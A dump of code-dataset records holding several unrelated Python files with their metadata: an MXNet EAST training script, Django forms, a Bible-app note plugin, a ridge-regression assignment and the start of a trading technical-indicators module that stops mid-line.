ls.PolyScheduler(max_update=ic_dataloader.length * epoches//batch_size, base_lr=lr)\n\n trainer = gluon.Trainer(east_model.collect_params(),\n 'sgd',\n {'learning_rate': lr,\n 'wd': 1e-5,\n 'momentum': 0.9,\n 'clip_gradient': 5,\n 'lr_scheduler':cos_shc}\n )\n EAST_loss = EASTLoss(cls_weight=0.01, iou_weight=1.0, angle_weight=20)\n step = 0\n lr_counter = 0\n lr_steps = [5, 10, 15, 20]\n lr_factor = 0.9\n\n for epoch in range(epoches):\n loss = []\n if epoch == lr_steps[lr_counter]:\n trainer.set_learning_rate(trainer.learning_rate*lr_factor)\n lr_counter += 1\n for i, batch_data in enumerate(ic_dataloader):\n im, score_map, geo_map, training_mask = map(lambda x: x.as_in_context(ctx), batch_data)\n\n with autograd.record(train_mode=True):\n\n f_score, f_geo = east_model(im)\n batch_loss = EAST_loss(score_map, f_score, geo_map, f_geo, training_mask)\n loss.append(batch_loss)\n batch_loss.backward()\n\n trainer.step(batch_size)\n # if i % 2 == 0:\n step = epoch * data_num + i * batch_size\n model_loss = np.mean(map(lambda x: x.asnumpy()[0], loss))\n summ_writer.add_scalar('model_loss', model_loss[0])\n logging.info(\"step: {}, loss: {}\".format(step, batch_loss.asnumpy()))\n ckpt_file = os.path.join(checkpoint_path, \"model_{}.params\".format(step))\n east_model.save_parameters(ckpt_file)\n logging.info(\"save model to {}\".format(ckpt_file))\n\nif __name__ == '__main__':\n train_dir = sys.argv[1]\n ckpt_path = sys.argv[2]\n ctxes = sys.argv[3]\n main(train_dir=train_dir, ctx=ctxes, checkpoint_path=ckpt_path, debug=True)\n", "repo_name": "saicoco/Gluon-EAST", "sub_path": "scripts/train_east.py", "file_name": "train_east.py", "file_ext": "py", "file_size_in_byte": 3058, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 15, "usage_type": "attribute"}, {"api_name": "mxboard.SummaryWriter", "line_number": 18, "usage_type": "call"}, {"api_name": "mxnet.gpu", "line_number": 21, "usage_type": "call"}, {"api_name": "mxnet.cpu", "line_number": 21, "usage_type": "call"}, {"api_name": "data.ic_data.text_detection_data", "line_number": 22, "usage_type": "call"}, {"api_name": "mxnet.gluon.data.DataLoader", "line_number": 23, "usage_type": "call"}, {"api_name": "model_zoo.east.EAST", "line_number": 26, "usage_type": "call"}, {"api_name": "model_zoo.east", "line_number": 26, "usage_type": "name"}, {"api_name": "mxnet.init.Xavier", "line_number": 29, "usage_type": "call"}, {"api_name": "mxnet.init", "line_number": 29, "usage_type": "attribute"}, {"api_name": "mxnet.lr_scheduler.PolyScheduler", "line_number": 32, "usage_type": "call"}, {"api_name": "mxnet.lr_scheduler", "line_number": 32, "usage_type": "name"}, {"api_name": "mxnet.gluon.Trainer", "line_number": 34, "usage_type": "call"}, {"api_name": "mxnet.gluon", "line_number": 34, "usage_type": "name"}, {"api_name": "model_zoo.EASTLoss", "line_number": 42, "usage_type": "call"}, {"api_name": "mxnet.autograd.record", "line_number": 56, "usage_type": "call"}, {"api_name": "mxnet.autograd", "line_number": 56, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 66, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 71, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 74, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 75, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 76, "usage_type": "attribute"}]} +{"seq_id": "70183338728", "text": "from django import forms\nfrom .models import *\n\n\nclass BackupSearch(forms.Form):\n start_date = forms.DateField(required=False, widget=forms.DateInput(attrs={'type': 'date',\n 'class': 'width-100',\n 'required': False}))\n end_date = forms.DateField(required=False, widget=forms.DateInput(attrs={'type': 'date',\n 'class': 'width-100',\n 'required': False}))\n name = forms.CharField(required=False, widget=forms.DateInput(attrs={'class': 'width-100',\n 'required': False}))\n\n\nclass UploadBackupForm(forms.Form):\n # allow .zip files only\n file = forms.FileField(required=True, widget=forms.FileInput(attrs={'id': 'backup_field', 'accept': '.zip'}))\n\n\nclass CommentForm(forms.ModelForm):\n class Meta:\n model = Comment\n fields = ['body']\n widgets = {\n 'body': forms.Textarea(attrs={'rows': 1, 'cols': 115, 'placeholder': 'Add a comment...'})\n }\n labels = {k: \"\" for k in fields}\n", "repo_name": "Fingolfin7/SoftriteAPI", "sub_path": "backups/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1313, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.forms.Form", "line_number": 5, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 5, "usage_type": "name"}, {"api_name": "django.forms.DateField", "line_number": 6, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 6, "usage_type": "name"}, {"api_name": "django.forms.DateInput", "line_number": 6, "usage_type": "call"}, {"api_name": "django.forms.DateField", "line_number": 9, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 9, "usage_type": "name"}, {"api_name": "django.forms.DateInput", "line_number": 9, "usage_type": "call"}, {"api_name": "django.forms.CharField", "line_number": 12, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 12, "usage_type": "name"}, {"api_name": "django.forms.DateInput", "line_number": 12, "usage_type": "call"}, {"api_name": "django.forms.Form", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 16, "usage_type": "name"}, {"api_name": "django.forms.FileField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 18, "usage_type": "name"}, {"api_name": "django.forms.FileInput", "line_number": 18, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 21, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 26, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "6404845655", "text": "import config\nfrom util.BibleVerseParser import BibleVerseParser\n\nif config.pluginContext:\n config.mainWindow.showNoteEditor()\n parser = BibleVerseParser(config.parserStandarisation)\n verseList = parser.extractAllReferences(config.pluginContext, False)\n if not verseList:\n config.mainWindow.displayMessage(config.thisTranslation[\"message_noReference\"])\n else:\n content = \"; \".join([parser.bcvToVerseReference(*verse) for verse in verseList])\n\n if hasattr(config.mainWindow, \"noteEditor\"):\n content = \"

{0}

\".format(content)\n if config.mainWindow.noteEditor.noteEditor.html:\n config.mainWindow.noteEditor.noteEditor.editor.insertHtml(content)\n else:\n config.mainWindow.noteEditor.noteEditor.editor.insertPlainText(content)\n else:\n config.contextItem = content\n config.mainWindow.createNewNoteFile()\nelse:\n config.contextSource.messageNoSelection()\n", "repo_name": "eliranwong/UniqueBible", "sub_path": "plugins/context/Insert References into Note Editor.py", "file_name": "Insert References into Note Editor.py", "file_ext": "py", "file_size_in_byte": 992, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 104, "dataset": "github-code", "pt": "53", "api": [{"api_name": "config.pluginContext", "line_number": 4, "usage_type": "attribute"}, {"api_name": "config.mainWindow.showNoteEditor", "line_number": 5, "usage_type": "call"}, {"api_name": "config.mainWindow", "line_number": 5, "usage_type": "attribute"}, {"api_name": "util.BibleVerseParser.BibleVerseParser", "line_number": 6, "usage_type": "call"}, {"api_name": "config.parserStandarisation", "line_number": 6, "usage_type": "attribute"}, {"api_name": "config.pluginContext", "line_number": 7, "usage_type": "attribute"}, {"api_name": "config.mainWindow.displayMessage", "line_number": 9, "usage_type": "call"}, {"api_name": "config.mainWindow", "line_number": 9, "usage_type": "attribute"}, {"api_name": "config.thisTranslation", "line_number": 9, "usage_type": "attribute"}, {"api_name": "config.mainWindow", "line_number": 13, "usage_type": "attribute"}, {"api_name": "config.mainWindow", "line_number": 15, "usage_type": "attribute"}, {"api_name": "config.mainWindow.noteEditor.noteEditor.editor.insertHtml", "line_number": 16, "usage_type": "call"}, {"api_name": "config.mainWindow", "line_number": 16, "usage_type": "attribute"}, {"api_name": "config.mainWindow.noteEditor.noteEditor.editor.insertPlainText", "line_number": 18, "usage_type": "call"}, {"api_name": "config.mainWindow", "line_number": 18, "usage_type": "attribute"}, {"api_name": "config.contextItem", "line_number": 20, "usage_type": "attribute"}, {"api_name": "config.mainWindow.createNewNoteFile", "line_number": 21, "usage_type": "call"}, {"api_name": "config.mainWindow", "line_number": 21, "usage_type": "attribute"}, {"api_name": "config.contextSource.messageNoSelection", "line_number": 23, "usage_type": "call"}, {"api_name": "config.contextSource", "line_number": 23, "usage_type": "attribute"}]} +{"seq_id": "72894779048", "text": "# -*- coding: utf-8 -*-\n\nimport numpy as np\nfrom sklearn import linear_model\n\n\nclass Regression:\n def __init__(self, lamb, m=1):\n self.lamb = lamb\n self.w = None\n self.M = m\n\n def fonction_base_polynomiale(self, x):\n \"\"\"\n Fonction de base qui projette la donnee x vers un espace polynomial tel que mentionne au chapitre 3.\n Si x est un scalaire, alors phi_x sera un vecteur à self.M dimensions : (x^1,x^2,...,x^self.M)\n Si x est un vecteur de N scalaires, alors phi_x sera un tableau 2D de taille NxM\n\n NOTE : En mettant phi_x = x, on a une fonction de base lineaire qui fonctionne pour une regression lineaire\n \"\"\"\n\n if np.isscalar(x):\n return x ** np.arange(self.M+1)\n\n return x[:, None] ** np.arange(self.M+1)\n\n def recherche_hyperparametre(self, X, t):\n \"\"\"\n Validation croisee de type \"k-fold\" pour k=10 utilisee pour trouver la meilleure valeur pour\n l'hyper-parametre self.M.\n\n Le resultat est mis dans la variable self.M\n\n X: vecteur de donnees\n t: vecteur de cibles\n \"\"\"\n # AJOUTER CODE ICI\n M_min = 1\n M_max = 201\n lamb_min = 0.0001\n lamb_max = 1\n lambs = list(np.geomspace(lamb_min, lamb_max, num=20))\n k = 10\n\n\n # Liste des items\n liste_indices = np.arange(len(X), dtype=np.int)\n # Pas nécéssaire de shuffle ?\n np.random.shuffle(liste_indices)\n\n # Split les indices en k \"chunks\"\n folds = np.array_split(liste_indices, 10)\n\n best_mean_error = np.inf\n\n for M in range(M_min, M_max):\n self.M = M\n\n for lamb in lambs:\n self.lamb = lamb\n\n erreur = np.zeros(k)\n for j in range(k):\n # Le chunk d'indices est celui de validation\n valid_indices = folds[j]\n # Les autres chunks serviront à l'entrainement\n train_indices = np.concatenate([f for i, f in enumerate(folds) if i != j])\n\n # Sélection des données\n x_valid = X[liste_indices[valid_indices]]\n t_valid = t[liste_indices[valid_indices]]\n x_train = X[liste_indices[train_indices]]\n t_train = t[liste_indices[train_indices]]\n\n # Entrainement et calcul d'erreur\n self.entrainement(x_train, t_train)\n pred_valid = np.array([self.prediction(x) for x in x_valid])\n erreur[j] = np.sum(self.erreur(t_valid, pred_valid))\n\n mean_error = np.mean(erreur)\n if mean_error <= best_mean_error:\n best_mean_error = mean_error\n best_M = M\n best_lamb = lamb\n\n self.M = best_M\n self.lamb = best_lamb\n print('M trouvé: {}'.format(self.M))\n print('lamb trouvé: {}'.format(self.lamb))\n\n def entrainement(self, X, t, using_sklearn=False):\n \"\"\"\n Entraîne la regression lineaire sur l'ensemble d'entraînement forme des\n entrees ``X`` (un tableau 2D Numpy, ou la n-ieme rangee correspond à l'entree\n x_n) et des cibles ``t`` (un tableau 1D Numpy ou le\n n-ieme element correspond à la cible t_n). L'entraînement doit\n utiliser le poids de regularisation specifie par ``self.lamb``.\n\n Cette methode doit assigner le champs ``self.w`` au vecteur\n (tableau Numpy 1D) de taille D+1, tel que specifie à la section 3.1.4\n du livre de Bishop.\n\n Lorsque using_sklearn=True, vous devez utiliser la classe \"Ridge\" de\n la librairie sklearn (voir http://scikit-learn.org/stable/modules/linear_model.html)\n\n Lorsque using_sklearn=Fasle, vous devez implementer l'equation 3.28 du\n livre de Bishop. Il est suggere que le calcul de ``self.w`` n'utilise\n pas d'inversion de matrice, mais utilise plutôt une procedure\n de resolution de systeme d'equations lineaires (voir np.linalg.solve).\n\n Aussi, la variable membre self.M sert à projeter les variables X vers un espace polynomiale de degre M\n (voir fonction self.fonction_base_polynomiale())\n\n NOTE IMPORTANTE : lorsque self.M <= 0, il faut trouver la bonne valeur de self.M\n\n \"\"\"\n\n # AJOUTER CODE ICI\n if self.M <= 0:\n self.recherche_hyperparametre(X, t)\n\n phi_X = self.fonction_base_polynomiale(X)\n\n if using_sklearn:\n reg = linear_model.Ridge(alpha=self.lamb, fit_intercept=False)\n reg.fit(phi_X, t)\n self.w = reg.coef_\n else:\n mat = self.lamb*np.identity(self.M+1) + np.dot(phi_X.T, phi_X)\n vec = np.dot(phi_X.T, t)\n self.w = np.linalg.solve(mat, vec)\n\n def prediction(self, x):\n \"\"\"\n Retourne la prediction de la regression lineaire\n pour une entree, representee par un tableau 1D Numpy ``x``.\n\n Cette methode suppose que la methode ``entrainement()``\n a prealablement ete appelee. Elle doit utiliser le champs ``self.w``\n afin de calculer la prediction y(x,w) (equation 3.1 et 3.3).\n \"\"\"\n # AJOUTER CODE ICI\n return np.dot(self.fonction_base_polynomiale(x), self.w)\n\n @staticmethod\n def erreur(t, prediction):\n \"\"\"\n Retourne l'erreur de la difference au carre entre\n la cible ``t`` et la prediction ``prediction``.\n \"\"\"\n # AJOUTER CODE ICI\n return (t-prediction)**2\n", "repo_name": "AntoineTheb/ift888", "sub_path": "Q1-pt2/solution_regression.py", "file_name": "solution_regression.py", "file_ext": "py", "file_size_in_byte": 5595, "program_lang": "python", "lang": "fr", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.isscalar", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.geomspace", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.array_split", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 80, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Ridge", "line_number": 125, "usage_type": "call"}, {"api_name": "sklearn.linear_model", "line_number": 125, "usage_type": "name"}, {"api_name": "numpy.identity", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.linalg.solve", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 131, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 143, "usage_type": "call"}]} +{"seq_id": "69930025127", "text": "import pandas as pd\nfrom parse import parse\nfrom stockstats import StockDataFrame as Sdf\nfrom finta import TA\nimport ta\nfrom collections import OrderedDict\nimport numpy as np\nfrom . import indicators_vsa as vsa\nfrom . import indicators_flabeling as flabeling\nfrom . import indicators_supertrend as supertrend\nfrom . import indicators_tradingview as tv\nfrom . import utils\n\ndef get_window_size(indicator):\n trend_parsed = parse('trend_{}d', indicator)\n sma_parsed = parse('sma_{}', indicator)\n ema_parsed = parse('ema_{}', indicator)\n wma_parsed = parse('wma_{}', indicator)\n\n if indicator in [\"open\", \"close\", \"high\", \"low\"]:\n return 1\n\n elif trend_parsed != None and trend_parsed[0].isdigit():\n return int(trend_parsed[0])\n\n elif sma_parsed != None and sma_parsed[0].isdigit():\n return int(sma_parsed[0])\n\n elif ema_parsed != None and ema_parsed[0].isdigit():\n return int(ema_parsed[0])\n\n elif wma_parsed != None and wma_parsed[0].isdigit():\n return int(wma_parsed[0])\n\n elif indicator in ['macd', 'macds', 'macdh']:\n return 26\n\n elif indicator == \"bbands\":\n return 20\n\n elif indicator in [\"rsi_30\", \"cci_30\", \"dx_30\"]:\n return 30\n \n elif indicator == \"rsi\":\n return 14\n\n elif indicator == 'williams_%r':\n return 14\n\n elif indicator in ['stoch_%k', 'stoch_%d']:\n return 14\n \n elif indicator == 'er':\n return 10\n \n elif indicator == 'stc':\n return 50\n \n elif indicator == 'atr':\n return 14\n \n elif indicator == 'adx':\n return 14\n \n elif indicator == 'roc':\n return 12\n\n elif indicator == 'mom':\n return 10\n\n elif indicator == 'simple_rtn':\n return 1\n\n elif indicator == 'labeling':\n return 20\n\n elif indicator.startswith('tv_'):\n return 0\n\n elif indicator.startswith('close_synthetic_'):\n return 0\n\n elif '_shift_' in indicator:\n lst_split = indicator.split(\"_\")\n if len(lst_split) == 3:\n return int(lst_split[2])\n else:\n return 0\n\n elif indicator == 'vsa':\n return 60\n\n elif indicator == \"super_trend_direction\":\n return 15\n\n print(\"unknown window size for \", indicator)\n return 0\n\ndef get_max_window_size(indicators):\n if len(indicators) == 0:\n return 0\n\n if isinstance(indicators, list):\n return max([get_window_size(indicator) for indicator in indicators])\n elif isinstance(indicators, dict):\n # if the parameters of all the indicators are dictionaries...\n #window_sizes = [parameters[\"window_size\"] if \"window_size\" in parameters else get_window_size(indicator) for indicator, parameters in indicators.items()]\n # but just in case there is something else :\n window_sizes = [0]\n for indicator in indicators:\n parameters = indicators[indicator]\n if isinstance(parameters, dict):\n parameters = indicators[indicator]\n if \"window_size\" in parameters:\n window_size = parameters[\"window_size\"]\n if isinstance(window_size, str):\n window_size = int(window_size)\n else:\n window_size = get_window_size(indicator)\n window_sizes.append(window_size)\n elif isinstance(parameters, int):\n window_sizes.append(parameters)\n else:\n window_size = get_window_size(indicator)\n window_sizes.append(window_size)\n\n return max(window_sizes)\n\n return 0\n\ndef get_feature_from_fdp_features(fdp_features):\n lst_features = []\n for feature in fdp_features:\n if len(fdp_features[feature]) == 0:\n lst_features.append(feature)\n elif fdp_features[feature] != None:\n lst_param = list(fdp_features[feature])\n if \"id\" in lst_param:\n id = \"_\" + fdp_features[feature][\"id\"]\n else:\n id = \"\"\n if \"n\" in lst_param:\n n = \"n\" + fdp_features[feature][\"n\"] + \"_\"\n else:\n n = \"\"\n if not feature.startswith(\"postprocess\"):\n lst_features.append(fdp_features[feature][\"indicator\"] + id)\n if \"output\" in lst_param:\n for output in fdp_features[feature][\"output\"]:\n lst_features.append(output + id)\n if \"indicator\" in fdp_features[feature] \\\n and fdp_features[feature][\"indicator\"] == \"shift\" \\\n and \"input\" in lst_param:\n for input in fdp_features[feature][\"input\"]:\n lst_features.append(n + input + id)\n return lst_features\n\ndef compute_indicators(df, indicators, keep_only_requested_indicators = False, params = None):\n if not isinstance(df, pd.DataFrame):\n return df\n\n # manage indicators as an array but it is converted into a dictionary\n if isinstance(indicators, list):\n indicators = dict.fromkeys(indicators, {})\n\n # call stockstats\n stock = Sdf.retype(df.copy())\n\n if isinstance(indicators, dict):\n keep_indicators = get_feature_from_fdp_features(indicators)\n else:\n keep_indicators = indicators\n\n # compute the indicators\n columns = list(df.columns)\n\n # be sure postprocess are treated at the end\n oindicators = OrderedDict()\n for indicator, parameters in indicators.items():\n if not indicator.startswith(\"postprocess\"):\n oindicators[indicator] = parameters\n for indicator, parameters in indicators.items():\n if indicator.startswith(\"postprocess\"):\n oindicators[indicator] = parameters\n \n\n for indicator, parameters in oindicators.items():\n if indicator in columns:\n continue\n \n # check if one deals with a postprocess\n if indicator.startswith(\"postprocess\"):\n if \"input\" in parameters and \"indicator\" in parameters and \"n\" in parameters:\n indicator = parameters[\"indicator\"]\n id = \"\"\n if \"id\" in parameters:\n id = \"_\"+parameters[\"id\"]\n n = parameters[\"n\"]\n if isinstance(n, str):\n n = int(n)\n input = [item+id for item in parameters[\"input\"]]\n if isinstance(input, list):\n if all(item in list(df.columns) for item in input):\n df = utils.get_n_columns(df, input, n)\n\n # check if the indicator is overriden\n if \"indicator\" in parameters:\n indicator = parameters[\"indicator\"]\n\n # prepare the suffix if an id is specified\n suffix = \"\"\n if 'id' in parameters:\n suffix = \"_\"+parameters[\"id\"]\n\n trend_parsed = parse('trend_{}d', indicator)\n sma_parsed = parse('sma_{}', indicator)\n ema_parsed = parse('ema_{}', indicator)\n wma_parsed = parse('wma_{}', indicator)\n slope_parsed = parse('slope_{}', indicator)\n\n if trend_parsed != None and trend_parsed[0].isdigit():\n seq = int(trend_parsed[0])\n diff = df[\"close\"] - df[\"close\"].shift(seq)\n df[\"trend_\"+str(seq)+\"d\"+ suffix] = diff.gt(0).map({False: 0, True: 1})\n\n elif indicator == \"sma\":\n seq = 10\n if \"window_size\" in parameters:\n seq = parameters[\"window_size\"]\n if isinstance(seq, str):\n seq = int(seq)\n df[\"sma\"+ suffix] = TA.SMA(stock, seq).copy()\n\n elif indicator == \"ema\":\n period = 10\n if \"window_size\" in parameters:\n period = parameters[\"window_size\"]\n if isinstance(period, str):\n period = int(period)\n # df[\"ema\"+ suffix] = TA.EMA(stock, period = period).copy()\n df[\"ema\"+ suffix] = ta.trend.ema_indicator(close=df['close'], window=period).copy()\n\n elif indicator == 'willr':\n period = 14\n if \"window_size\" in parameters:\n period = parameters[\"window_size\"]\n if isinstance(period, str):\n period = int(period)\n df['willr'] = ta.momentum.williams_r(high=df['high'], low=df['low'], close=df['close'], lbp=period).copy()\n\n elif indicator == 'willr_trend':\n period = 14\n if \"window_size\" in parameters:\n period = parameters[\"window_size\"]\n if isinstance(period, str):\n period = int(period)\n\n predict_window = 4\n if \"pred_window_size\" in parameters:\n predict_window = parameters[\"pred_window_size\"]\n if isinstance(predict_window, str):\n predict_window = int(predict_window)\n\n df['willr_trend'] = ta.momentum.williams_r(high=df['high'], low=df['low'], close=df['close'], lbp=period).copy()\n\n df['willr_trend' + suffix] = df['willr_trend' + suffix].shift(-1)\n df.at[df.index[-1], \"willr_trend\" + suffix] = 0\n predict_val, coef = utils.predict_next_LinearRegression(df, 'willr_trend' + suffix, predict_window)\n\n df[\"willr_trend\" + suffix] = utils.discret_coef(coef)\n\n elif indicator == \"wma\":\n period = 10\n if \"window_size\" in parameters:\n period = parameters[\"window_size\"]\n if isinstance(period, str):\n period = int(period)\n df[\"wma\"+ suffix] = TA.WMA(stock, period = period).copy()\n\n elif sma_parsed != None and sma_parsed[0].isdigit():\n seq = int(sma_parsed[0])\n df[\"sma_\"+str(seq)+ suffix] = TA.SMA(stock, seq).copy()\n\n elif ema_parsed != None and ema_parsed[0].isdigit():\n period = int(ema_parsed[0])\n df[\"ema_\"+str(period)+ suffix] = TA.EMA(stock, period = period).copy()\n\n elif wma_parsed != None and wma_parsed[0].isdigit():\n period = int(wma_parsed[0])\n df[\"wma_\"+str(period)+ suffix] = TA.WMA(stock, period = period).copy()\n\n elif slope_parsed != None and slope_parsed[0].isdigit():\n period = int(slope_parsed[0])\n df[\"slope_\"+str(period)+ suffix] = df[\"close\"].rolling(window=period).apply(lambda x: np.polyfit(range(len(x)), x, 1)[0])\n\n elif indicator == 'macd':\n df['macd' + suffix] = stock.get('macd').copy() # from stockstats\n #df['macd'] = TA.MACD(stock)['MACD'].copy() # from finta\n\n elif indicator == 'macds':\n df['macds' + suffix] = stock.get('macds').copy() # from stockstats\n\n elif indicator == 'macdh':\n df['macdh' + suffix] = stock.get('macdh').copy() # from stockstats\n\n elif indicator == 'bbands':\n bbands = TA.BBANDS(stock).copy()\n df = pd.concat([df, bbands], axis = 1)\n df.rename(columns={'BB_UPPER': 'bb_upper' + suffix}, inplace=True)\n df.rename(columns={'BB_MIDDLE': 'bb_middle' + suffix}, inplace=True)\n df.rename(columns={'BB_LOWER': 'bb_lower' + suffix}, inplace=True)\n\n elif indicator == 'rsi':\n rsi_window = 14\n if \"window_size\" in parameters:\n rsi_window = parameters[\"window_size\"]\n if isinstance(rsi_window, str):\n rsi_window = int(rsi_window)\n df['rsi' + suffix] = ta.momentum.rsi(close=df[\"close\"], window=rsi_window)\n\n elif indicator == 'stoch_rsi':\n rsi_window = 14\n smooth_k = 3\n smooth_d = 3\n if \"stoch_rsi_window_size\" in parameters:\n rsi_window = parameters[\"stoch_rsi_window_size\"]\n if isinstance(rsi_window, str):\n rsi_window = int(rsi_window)\n\n df['stoch_rsi' + suffix] = ta.momentum.stochrsi(close=df[\"close\"]\n , window=rsi_window) * 100\n df['stoch_rsi_k' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"],\n window=rsi_window).stochrsi_k() * 100\n df['stoch_rsi_d' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"],\n window=rsi_window).stochrsi_d() * 100\n elif indicator == 'stoch_rsi_pred':\n rsi_window = 14\n if \"stoch_rsi_window_size\" in parameters:\n rsi_window = parameters[\"stoch_rsi_window_size\"]\n if isinstance(rsi_window, str):\n rsi_window = int(rsi_window)\n \n predict_window = 4\n if \"pred_window_size\" in parameters:\n predict_window = parameters[\"pred_window_size\"]\n if isinstance(predict_window, str):\n predict_window = int(predict_window)\n \n df['stoch_rsi_pred' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"], window=rsi_window).stochrsi() * 100\n df['stoch_rsi_pred' + suffix] = df['stoch_rsi_pred' + suffix].shift(-1)\n df.at[df.index[-1], \"stoch_rsi_pred\" + suffix] = 0\n predict_val, coef = utils.predict_next_LinearRegression(df, 'stoch_rsi_pred' + suffix, predict_window)\n if predict_val < 0:\n predict_val = 0\n elif predict_val > 100:\n predict_val = 100\n df.at[df.index[-1], \"stoch_rsi_pred\" + suffix] = predict_val\n\n elif indicator == 'stoch_rsi_trend':\n rsi_window = 14\n if \"stoch_rsi_window_size\" in parameters:\n rsi_window = parameters[\"stoch_rsi_window_size\"]\n if isinstance(rsi_window, str):\n rsi_window = int(rsi_window)\n\n predict_window = 4\n if \"pred_window_size\" in parameters:\n predict_window = parameters[\"pred_window_size\"]\n if isinstance(predict_window, str):\n predict_window = int(predict_window)\n \n df['stoch_rsi_trend' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"],\n window=rsi_window).stochrsi() * 100\n df['stoch_rsi_k_trend' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"],\n window=rsi_window).stochrsi_k() * 100\n df['stoch_rsi_d_trend' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"],\n window=rsi_window).stochrsi_d() * 100\n df['stoch_rsi_trend' + suffix] = df['stoch_rsi_trend' + suffix].shift(-1)\n df['stoch_rsi_k_trend' + suffix] = df['stoch_rsi_k_trend' + suffix].shift(-1)\n df['stoch_rsi_d_trend' + suffix] = df['stoch_rsi_d_trend' + suffix].shift(-1)\n\n df.at[df.index[-1], \"stoch_rsi_trend\" + suffix] = 0\n predict_val, coef = utils.predict_next_LinearRegression(df, 'stoch_rsi_trend' + suffix, predict_window)\n df[\"stoch_rsi_trend\" + suffix] = utils.discret_coef(coef)\n\n df.at[df.index[-1], \"stoch_rsi_k_trend\" + suffix] = 0\n predict_val, coef = utils.predict_next_LinearRegression(df, 'stoch_rsi_k_trend' + suffix, predict_window)\n df[\"stoch_rsi_k_trend\" + suffix] = utils.discret_coef(coef)\n\n df.at[df.index[-1], \"stoch_rsi_d_trend\" + suffix] = 0\n predict_val, coef = utils.predict_next_LinearRegression(df, 'stoch_rsi_d_trend' + suffix, predict_window)\n df[\"stoch_rsi_d_trend\" + suffix] = utils.discret_coef(coef)\n\n elif indicator == 'atr':\n atr_window = 14\n if \"window_size\" in parameters:\n atr_window = parameters[\"window_size\"]\n if isinstance(atr_window, str):\n atr_window = int(atr_window)\n df['atr' + suffix] = ta.volatility.AverageTrueRange(high=df[\"high\"], low=df[\"low\"], close=df[\"close\"], window=atr_window).average_true_range()\n\n elif indicator == 'ao':\n ao_window_1 = 6\n if \"ao_window_1\" in parameters:\n ao_window_1 = parameters[\"ao_window_1\"]\n if isinstance(ao_window_1, str):\n ao_window_1 = int(ao_window_1)\n\n ao_window_2 = 22\n if \"ao_window_2\" in parameters:\n ao_window_2 = parameters[\"ao_window_2\"]\n if isinstance(ao_window_2, str):\n ao_window_2 = int(ao_window_2)\n\n df['ao'] = ta.momentum.awesome_oscillator(df['high'], df['low'], window1=ao_window_1, window2=ao_window_2).copy()\n \n elif indicator == 'ao_trend':\n ao_window_1 = 6\n if \"ao_window_1\" in parameters:\n ao_window_1 = parameters[\"ao_window_1\"]\n if isinstance(ao_window_1, str):\n ao_window_1 = int(ao_window_1)\n\n ao_window_2 = 22\n if \"ao_window_2\" in parameters:\n ao_window_2 = parameters[\"ao_window_2\"]\n if isinstance(ao_window_2, str):\n ao_window_2 = int(ao_window_2)\n \n predict_window = 4\n if \"pred_window_size\" in parameters:\n predict_window = parameters[\"pred_window_size\"]\n if isinstance(predict_window, str):\n predict_window = int(predict_window)\n\n df['ao_trend'] = ta.momentum.awesome_oscillator(df['high'], df['low'], window1=ao_window_1, window2=ao_window_2).copy()\n df['ao_trend' + suffix] = df['ao_trend' + suffix].shift(-1)\n df.at[df.index[-1], \"ao_trend\" + suffix] = 0\n predict_val, coef = utils.predict_next_LinearRegression(df, 'ao_trend' + suffix, predict_window)\n \n df[\"ao_trend\" + suffix] = utils.discret_coef(coef)\n\n elif indicator == 'bollinger':\n bol_window = 100\n if \"window_size\" in parameters:\n bol_window = 